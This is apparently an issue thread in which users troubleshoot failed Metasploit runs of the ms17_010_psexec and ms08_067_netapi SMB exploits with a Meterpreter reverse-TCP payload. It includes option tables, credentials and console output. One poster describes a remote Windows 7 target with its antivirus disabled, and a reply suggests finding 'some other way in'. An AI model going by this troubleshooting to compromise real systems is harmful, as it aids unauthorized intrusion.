Hey got an issue with the payload windows/meterpreter/reverse_tcp
Im Using Windows 10 and the "1" Port is an self created open port
Can u pls tell me whats wrong with the timeout? I got an stable Internet connection so i see no reason why it should do this...
[-] []34:1 - Rex::ConnectionTimeout: The connection timed out ([]34:1).
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) >
Show us your options.
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES C:/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.8/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOST [].34 yes The target address
RPORT 1 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass 1234 no The password for the specified username
SMBUser Silke no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST [].39 yes The listen address (an interface may be specified)
LPORT 1 yes The listen port
Exploit target:
Id Name
0 Automatic
[].34:1 - Rex::ConnectionTimeout: The connection timed out ([].34:1)
The Target PC has Windows 7 and programs like Kaspersky got shutted down. Also ofc he was online and i created by my self a open port
thank for the reply :)
I don't think your RPORT should be 1 unless it's forwarded. Normally it should be 445.
Yeah, you're unlikely to hit an actual SMB service on any port other than 445. And if this across the internet, any reasonable ISP has that port blocked anyway. You'll likely have to find some other way in.
show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.29.87 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > run
[] Started reverse TCP handler on 192.168.29.87:4444
[] Exploit completed, but no session was created.
pls pls pls solve this problem
pls pls pls solve this problem
The connection to 10.10.10.4:445 timed out. Ensure that you can access 10.10.10.4:445. You can test with netcat: nc 10.10.10.4 445 -v
Most helpful comment
Yeah, you're unlikely to hit an actual SMB service on any port other than 445. And if this across the internet, any reasonable ISP has that port blocked anyway. You'll likely have to find some other way in.